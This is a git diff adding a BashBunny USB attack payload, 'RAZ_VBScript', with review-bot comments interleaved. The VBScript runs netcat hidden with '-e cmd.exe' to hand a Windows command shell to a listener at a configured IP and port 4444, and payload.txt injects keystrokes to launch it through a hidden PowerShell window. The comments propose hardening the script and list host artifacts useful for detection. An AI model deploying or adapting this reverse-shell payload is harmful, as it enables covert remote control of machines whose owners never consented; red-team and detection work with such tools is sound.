diff --git a/payloads/library/RAZ_VBScript/a.vbs b/payloads/library/RAZ_VBScript/a.vbs
new file mode 100644
index 00000000..fd1a23a6
--- /dev/null
+++ b/payloads/library/RAZ_VBScript/a.vbs
@@ -0,0 +1,162 @@
+Option Explicit
+
+'==============================================================================
+' Title: a.vbs
+' Author: RalphyZ
+' Version: 1.0
+' Target: Windows 7+
+'
+' Description:
+' This VBScript is used by a BashBunny payload to
+' to create a netcat reverse shell. The netcat listener
+' IP Address and Port are stored in separate files - so that
+' Red Teams can quickly change information. The "IncrementPort"
+' subroutine will increase the port number by 1 every time the
+' script is called. This is so that you can start multiple
+' listeners while doing a PenTest, and grab multiple reverse
+' shells in one trip. Uncomment that if you want the auto-increment
+'
+' Note: You must put the netcat executable in the strReverseShellPath directory
+'==============================================================================
+
+' Declare Constants
+Const ForReading = 1
+Const ForWriting = 2
+
+' Declare Global Variables
+Dim strListenerPort, strNewListenerPort, strListenerIP
+Dim objFSO, objFile, strCurrentDirectory
+Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
+
+' The netcat executable name
+strNetCatEXE = "nc.exe"
+
+' The folder location
+strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
+
+' The file containing the listener port
+strListnerPortFile = "listener_port.txt"
+
+' The file containing the listener ip address
+strListenerIPFile = "listener_ip.txt"
+
+' Create a File System Object
+Set objFSO = CreateObject("Scripting.FileSystemObject")
+
+strCurrentDirectory = FindCurrentDirectory()
+
+' Read the Host IP Address (where the listener resides)
+ReadHostIP
+
+' Read the listener port
+ReadPort
+
+' Increment the listener port - for multiple shells
+' Great for Red Teams
+'IncrementPort
+
+' Start NetCat Reverse Shell
+StartNetCat
+
+'==============================================================================
+' Name: FindCurrentDirectory
+' Arguments: None
+' Return Value: None
+' Description: Find the netcat executable
+'==============================================================================
+Function FindCurrentDirectory
+ Dim objDrives, d
+
+ ' Set default return value
+ FindCurrentDirectory = ""
+
+ ' Search all drives for the netcat exe
+ Set objDrives = objFSO.Drives
+ For Each d in objDrives
+ If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
+ FindCurrentDirectory = d + strReverseShellPath
+ End if
+ Next
+End Function
+
+'==============================================================================
+' Name: ReadHostIP
+' Arguments: None
+' Return Value: None
+' Description: Read the listener IP
+'==============================================================================
+Sub ReadHostIP()
+ ' Opens the file for reading
+ Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
+
+ ' Read the host IP
+ strListenerIP = objFile.ReadAll
+
+ ' Close the file
+ objFile.Close
+End Sub
+
+
+'==============================================================================
+' Name: ReadPort
+' Arguments: None
+' Return Value: None
+' Description: Read the listener port
+'==============================================================================
+Sub ReadPort()
+ ' Opens the file for reading
+ Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
+
+ ' Read the listener port
+ strListenerPort = objFile.ReadAll
+
+ ' Close the file
+ objFile.Close
+End Sub
+
+'==============================================================================
+' Name: IncrementPort
+' Arguments: None
+' Return Value: None
+' Description: Read the listener port, increment the counter by 1, and write
+' the new value
+'==============================================================================
+Sub IncrementPort()
+ ' Increment the listener port
+ strNewListenerPort = strListenerPort + 1
+
+ ' Open the file that contains the listener port for writing
+ Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
+
+ ' Write the new (incremented) port
+ objFile.WriteLine strNewListenerPort
+
+ ' Close the file
+ objFile.Close
+End Sub
+
+'==============================================================================
+' Name: StartNetCat
+' Arguments: None
+' Return Value: None
+' Description: Start netcat on the appropriate port
+'==============================================================================
+Sub StartNetCat()
+ Dim strNetCat, strCommand, objShell
+
+ ' Build the path to the netcat executable
+ strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
+
+ ' Create the command string to run netcat on the correct ip and port,
+ ' and serve cmd.exe to the listener
+ strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
+
+ ' Create the WScript Shell object
+ Set objShell = WScript.CreateObject ("WScript.Shell")
+
+ ' Run the command (' , 0'= hidden)
+ objShell.run strCommand, 0
+
+ ' Free the object from memory
+ Set objShell = Nothing
+End Sub
\ No newline at end of file
diff --git a/payloads/library/RAZ_VBScript/listener_ip.txt b/payloads/library/RAZ_VBScript/listener_ip.txt
new file mode 100644
index 00000000..b1c12741
--- /dev/null
+++ b/payloads/library/RAZ_VBScript/listener_ip.txt
@@ -0,0 +1 @@
+192.168.1.100
\ No newline at end of file
diff --git a/payloads/library/RAZ_VBScript/listener_port.txt b/payloads/library/RAZ_VBScript/listener_port.txt
new file mode 100644
index 00000000..1b824382
--- /dev/null
+++ b/payloads/library/RAZ_VBScript/listener_port.txt
@@ -0,0 +1 @@
+4444
\ No newline at end of file
diff --git a/payloads/library/RAZ_VBScript/payload.txt b/payloads/library/RAZ_VBScript/payload.txt
new file mode 100644
index 00000000..b395f94f
--- /dev/null
+++ b/payloads/library/RAZ_VBScript/payload.txt
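Review bot: In a.vbs the top-level code never checks the result of `FindCurrentDirectory()`, which stays `""` when no drive contains the expected folder; `ReadHostIP` and `ReadPort` then open `listener_ip.txt` and `listener_port.txt` relative to the working directory and `StartNetCat` hands a bare `nc.exe` to `objShell.run`, so the script would act on files it did not ship with. Stop right after the assignment instead: `If strCurrentDirectory = "" Then WScript.Quit 1`. The two values are also taken with `ReadAll` and concatenated into `strCommand` unchecked, trailing newline included; trimming them and rejecting anything that is not an address and a numeric port keeps the command line to what the operator configured. For anyone building detections from this file, the chain it produces is a script host starting `nc.exe` with `-e cmd.exe` in a hidden window (`objShell.run strCommand, 0`).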
@@ -0,0 +1,35 @@
+#!/bin/bash
+#
+# Title: RAZ_VBScript
+# Author: RalphyZ
+# Version: 1.0
+# Target: Windows 7+
+# Dependencies: VBScript (a.vbs) in the switch folder with this file
+#
+# Description: Executes a VBScript, concealed in a hidden PowerShell window
+#
+# Colors:
+# Green.....................Working
+# White.....................Completed without error
+# Light-Blue (blinking).....a.vbs was not found
+
+LED G
+ATTACKMODE HID STORAGE
+
+# Get the switch position
+source bunny_helpers.sh
+
+# Check if a.vbs is present
+if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
+ LED B G 100
+ exit 1
+fi
+
+# Run the VBScript
+QUACK GUI r
+QUACK DELAY 100
+QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
+QUACK ENTER
+
+# Green LED for finished
+LED R G B
\ No newline at end of file
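Review bot: The header documents the LED states but not what the `QUACK` lines leave on the host, which is what a blue team validating the exercise needs: a Run-dialog entry, a `powershell -WindowStyle Hidden` process that looks up a volume by label through `gwmi win32_volume`, and a script launched from removable storage (presumably through the default script host for `.vbs`). I would add a comment under the Description line such as `# Host artifacts: Run dialog history, powershell.exe -WindowStyle Hidden, a.vbs started from the BashBunny volume`. Separately, the closing comment says `# Green LED for finished` while `LED R G B` is the white state the header calls "Completed without error", and it is set as soon as the keystrokes are sent, so it does not show that a.vbs actually ran.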